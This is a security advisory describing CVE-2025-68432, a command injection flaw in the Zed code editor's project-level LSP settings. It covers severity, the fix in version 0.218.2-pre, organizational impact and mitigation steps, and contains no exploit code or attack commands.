CVE-2025-68432 is a command injection vulnerability classified under CWE-77 affecting the Zed code editor prior to version 0.218.2-pre. Zed loads Language Server Protocol (LSP) configurations from a project-specific settings file located at .zed/settings.json. These configurations can include shell commands that are executed on the host system with the privileges of the user running the IDE. The vulnerability arises because Zed does not properly sanitize or neutralize special shell elements within these LSP configurations, allowing an attacker to embed arbitrary shell commands. When a user opens a project containing a malicious settings.json file, these commands execute, leading to arbitrary code execution. Exploitation requires the attacker to seed the project directory with a malicious settings.json file and the user to open the project in Zed without inspecting the file contents. The vulnerability has a CVSS 3.1 score of 7.8, indicating high severity, with attack vector local, high attack complexity, no privileges required, user interaction required, and impacts on confidentiality, integrity, and availability. The fix introduced in version 0.218.2-pre implements a worktree trust mechanism that restricts loading configurations from untrusted project directories, mitigating the risk. No known exploits are reported in the wild yet, but the vulnerability poses a significant risk due to the ability to execute arbitrary code with user privileges.

For European organizations, this vulnerability poses a significant risk especially to software development teams and environments where Zed is used as the IDE. Successful exploitation can lead to arbitrary code execution with the same privileges as the user running Zed, potentially compromising sensitive source code, intellectual property, and internal systems. Attackers could use this to install malware, exfiltrate data, or move laterally within networks. Since the attack requires local access to plant malicious project files or trick users into opening compromised projects, insider threats or supply chain attacks (e.g., malicious code repositories) are plausible vectors. The impact extends to confidentiality, integrity, and availability of development environments and potentially connected systems. Given the high adoption of modern IDEs in European tech sectors, organizations that do not upgrade or enforce strict project file review policies are at elevated risk. This could disrupt development workflows and lead to broader organizational compromise.

1. Upgrade all Zed IDE installations to version 0.218.2-pre or later, which includes the worktree trust mechanism to prevent loading untrusted LSP configurations. 2. Implement strict policies requiring developers to review and validate the contents of .zed/settings.json files before opening projects, especially those sourced externally or from untrusted repositories. 3. Employ endpoint security solutions that monitor and restrict unauthorized file modifications in development directories. 4. Use sandboxing or containerization for development environments to limit the impact of potential code execution. 5. Educate developers about the risks of opening projects from unknown or untrusted sources and encourage the use of version control systems with signed commits to verify project integrity. 6. Monitor for unusual process executions or shell command invocations originating from the Zed IDE processes. 7. Consider network segmentation to limit lateral movement if a developer machine is compromised. 8. Regularly audit and update development tools to incorporate security patches promptly.